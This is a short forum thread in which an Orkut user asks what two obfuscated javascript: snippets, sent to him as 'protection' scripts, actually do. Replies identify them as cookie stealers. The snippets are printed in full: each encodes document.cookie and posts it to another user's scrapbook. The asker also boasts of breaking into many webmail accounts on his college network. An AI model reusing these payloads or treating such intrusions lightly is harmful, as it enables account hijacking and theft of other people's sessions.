Wat does this JAVA script do?

Status
Not open for further replies.

matav

to start of...
1stly - i dont know java scripting...
2ndly - i'm a member of orkut and i have a community [that i've removed recently]
now a few ppl are scrapping me telling me to put certain javascripts in my scrapbook to prevent anyone hacking my accountand to increase the number of members in my account and also to ban spammers.
two ppl have sent me these scripts:
javascript: orkut=replyForm;orkut.toUserId.value=73325625;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action='Scrapbook.aspx?Action.writeScrapBasic';orkut.submit()
and
javascript:maddy=replyForm;maddy.toUserId.value=74660961;maddy.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));maddy.action='Scrapbook.aspx?Action.writeScrapBasic';maddy.submit()
now there is definitely something wrong. how will this help prevent anyone from hacking my account or especially increase my community members by 10000, just by putting this script in MY scrapbook?
and wat has my scrapbook got to do with my community?
crap! something is fishy but i have no idea what this script does.
does anyone know?

I'm no Orkut or JavaScript wizard, but it looks like they are stealing your Orkut cookies. I would guess this would let them log in as you.

BTW, JavaScript has got absolutely nothing to do with Java :)

well... yeah I read somewhere about stealing cookies and doing mischief.
I did that once... but just for the heck of it [got access to many yahoo, hotmail and rediffmail accounts on my college lan].:evil:
but I had used a software :stickout: , not java scripting.
I guess i'm partly a script-kiddie.:p

Since you admit to hacking systems, maybe you should consider what you had to get through to access someone's account! Seems kind of strange that an admitted "script kiddie" is not asking how to keep others of of his system!

Status
Not open for further replies.
Back